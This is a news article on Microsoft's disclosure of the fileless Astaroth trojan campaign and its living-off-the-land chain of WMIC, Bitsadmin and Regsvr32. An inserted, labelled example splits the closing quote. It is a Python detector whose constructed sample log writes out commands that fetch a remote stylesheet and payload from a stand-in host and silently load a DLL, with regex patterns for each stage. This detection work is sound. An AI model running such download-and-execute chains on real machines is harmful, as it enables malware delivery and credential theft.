9 July 2019

Microsoft warns about fileless Astaroth trojan campaign


Microsoft Defender ATP Research Team has disclosed details about an ongoing malware campaign that is distributing the Astaroth malware using fileless and living-off-the-land techniques, which make it harder for security researchers and antivirus solutions to detect ongoing attacks.

The Astaroth malware trojan, which has been active since at least 2017, is able to steal users' sensitive information like their credentials, keystrokes, and other data, without dropping any executable file on the disk or installing any software on the victim's machine. All the information is then sent to a remote attacker who can use the data to move laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.

While analysing Windows telemetry data, Andrea Lelli, a member of the Windows Defender ATP team, spotted a sudden spike in usage of the Windows Management Instrumentation Command-line (WMIC) – a legitimate tool that ships with all modern versions of Windows. Upon further investigation it became clear that the source of the suspicious activity was a campaign that aimed to run the Astaroth backdoor directly in memory.

The discovered malware campaign uses several fileless techniques and a multi-stage infection process that starts with a spear-phishing email containing a malicious link that led potential victims to an LNK file.

When the LNK file is double-clicked, it causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of JavaScript code. The JavaScript code in turn downloads payloads by abusing the legitimate Bitsadmin tool.

“Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process,” explained the researcher in a blogpost.

What this means is that the malware doesn’t rely on any traditional methods (vulnerability exploits or trojan downloaders), instead using only legitimate system tools and commands to achieve its goal and to disguise its activity – a technique that security experts call "living off the land". This technique allows the malware to hide from most endpoint antivirus solutions, which are based on static file analysis.

For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded, said Lelli. The researcher pointed out that:
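The stage sequence the article describes (WMIC with a remote "/Format" stylesheet, Bitsadmin downloads, Regsvr32 loading a DLL) leaves no file for a static scanner to inspect, but each stage is a process creation that endpoint telemetry records. The following is an added example, not code from the article or from Microsoft's research: a small Python detector that runs over constructed process-creation records (Sysmon Event ID 1 / Windows 4688 style) and reports a host only when all three stages appear in order inside a short window. The record layout, host names, file paths and URLs are assumptions made for this example.

```python
# Added example (not Microsoft's or the article's own material): detect the
# living-off-the-land process chain described above over constructed
# process-creation records. Layout, hosts, paths and URLs are assumptions.
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    host: str
    parent: str    # parent process image (e.g. Sysmon ParentImage)
    image: str     # created process image name
    cmdline: str   # full command line


# Constructed sample records in an assumed "ts|host|parent|image|cmdline"
# layout; they are not real telemetry. Only WS01 shows the full chain.
SAMPLE_LOG = """\
2019-07-09T10:01:03|WS01|explorer.exe|wmic.exe|wmic.exe os get /format:"https://example.invalid/stage.xsl"
2019-07-09T10:01:09|WS01|wmic.exe|bitsadmin.exe|bitsadmin.exe /transfer job1 https://example.invalid/p.bin C:\\Users\\Public\\p.bin
2019-07-09T10:01:40|WS01|wmic.exe|regsvr32.exe|regsvr32.exe /s C:\\Users\\Public\\p.dll
2019-07-09T10:02:00|WS02|cmd.exe|wmic.exe|wmic.exe os get /format:list
2019-07-09T11:30:00|WS03|msiexec.exe|regsvr32.exe|regsvr32.exe /s C:\\Program Files\\Vendor\\ctl.dll
"""


def parse_line(line: str) -> ProcEvent:
    """Parse one record of the assumed pipe-delimited layout."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(datetime.fromisoformat(ts), host, parent, image, cmdline)


# One rule per stage: (stage name, process image, command-line pattern).
# /format is only suspicious when it points at a remote stylesheet; the
# built-in local formats (list, csv, ...) are normal administrative use.
STAGE_RULES = [
    ("wmic_format_remote", "wmic.exe",
     re.compile(r'/format\s*:\s*["\']?https?://', re.I)),
    ("bitsadmin_transfer", "bitsadmin.exe", re.compile(r"/transfer\b", re.I)),
    ("regsvr32_silent_load", "regsvr32.exe", re.compile(r"(^|\s)/s(\s|$)", re.I)),
]
STAGE_ORDER = [name for name, _, _ in STAGE_RULES]


def match_stage(ev: ProcEvent):
    """Return the stage name an event matches, or None."""
    for name, image, pat in STAGE_RULES:
        if ev.image.lower() == image and pat.search(ev.cmdline):
            return name
    return None


def find_chains(events, window_seconds: int = 600):
    """Report hosts where every stage appears, in order, within the window.
    A single stage hit is only a weak signal; the ordered sequence is the
    high-confidence one."""
    first_seen = defaultdict(dict)      # host -> stage -> first timestamp
    for ev in sorted(events, key=lambda e: e.ts):
        stage = match_stage(ev)
        if stage and stage not in first_seen[ev.host]:
            first_seen[ev.host][stage] = ev.ts
    window = timedelta(seconds=window_seconds)
    chains = []
    for host, seen in first_seen.items():
        if all(s in seen for s in STAGE_ORDER):
            times = [seen[s] for s in STAGE_ORDER]
            if times == sorted(times) and times[-1] - times[0] <= window:
                chains.append({"host": host, "start": times[0], "end": times[-1]})
    return chains


def run_sample():
    """Parse the constructed log and return (events, detected chains)."""
    events = [parse_line(l) for l in SAMPLE_LOG.splitlines() if l.strip()]
    return events, find_chains(events)


if __name__ == "__main__":
    events, chains = run_sample()
    for ev in events:
        print(ev.ts.isoformat(), ev.host, ev.image, match_stage(ev))
    for c in chains:
        print("CHAIN", c["host"], c["start"].isoformat(), "->", c["end"].isoformat())
```

On the sample data only WS01 is reported: WS02 runs WMIC with a local format and never matches, and the lone Regsvr32 on WS03 is a stage hit without a chain, which is how a real environment looks, since silent Regsvr32 loads and BITS transfers are common in legitimate software deployment. In production the parent-process field is worth using as a further condition (a command-line tool spawned from an Explorer-launched shortcut, Bitsadmin spawned by WMIC), and the same stage-plus-sequence pattern transfers to a SIEM query or an EDR custom rule.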

“Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”
